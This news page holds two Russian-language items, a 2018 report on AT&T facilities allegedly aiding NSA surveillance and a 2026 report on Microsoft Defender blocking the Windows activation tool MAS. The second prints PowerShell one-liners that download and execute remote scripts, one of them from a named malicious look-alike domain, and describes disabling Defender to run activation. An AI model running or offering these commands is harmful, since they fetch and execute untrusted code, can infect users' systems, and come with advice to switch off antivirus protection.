Объекты крупнейшего оператора связи США помогают АНБ шпионить

Олег Иванов 26 Июня 2018 - 16:52

...

Объекты крупнейшего оператора связи США помогают АНБ шпионить

Согласно сообщениям зарубежных СМИ, объекты AT&T, расположенные в нескольких американских городах, принимают участие в шпионаже Агентства национальной безопасности (АНБ) США. Всего сообщается о восьми объектах в Атланте, Чикаго, Далласе, Лос-Анджелесе, Нью-Йорке, Сан-Франциско, Сиэтле и Вашингтоне.

В сущности, это установки для пиринга, которые обычно направляют трафик других телекоммуникационных компаний в сеть AT&T. Однако в этом случае эти объекты могут быть использованы для передачи чужих пакетов в руки АНБ.

Соответствующие выводы представило издательство The Intercept, представитель AT&T Кристофер Августин на данный момент никак не опроверг этих обвинений.

Так зачем же АНБ собирает эти данные?

Системы АНБ устроены таким образом, что реагируют на определенные «селекторы» — имена, адреса электронной почты или номера телефона. Однако если этот селектор попался в электронном письме, «АНБ получит копию всего ящика, а не только отдельных сообщений, содержащих этот селектор».

Специалисты пришли к выводу, что полученные таким образом данные были санкционированы распоряжением эпохи Рейгана, известным как 12333.

«12333 используется для атак целей, находящихся за границей, сбор даных происходит за пределами США», — говорил по поводу этого распоряжения Джон Тай, бывший сотрудник Госдепартамента. — «Я считаю, что случайный сбор данных граждан Америки идет вразрез с Конституцией».

Ранее AT&T уже подвергалась критике за продажу данных о местоположении своих клиентов в режиме реального времени сторонним компаниям.

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.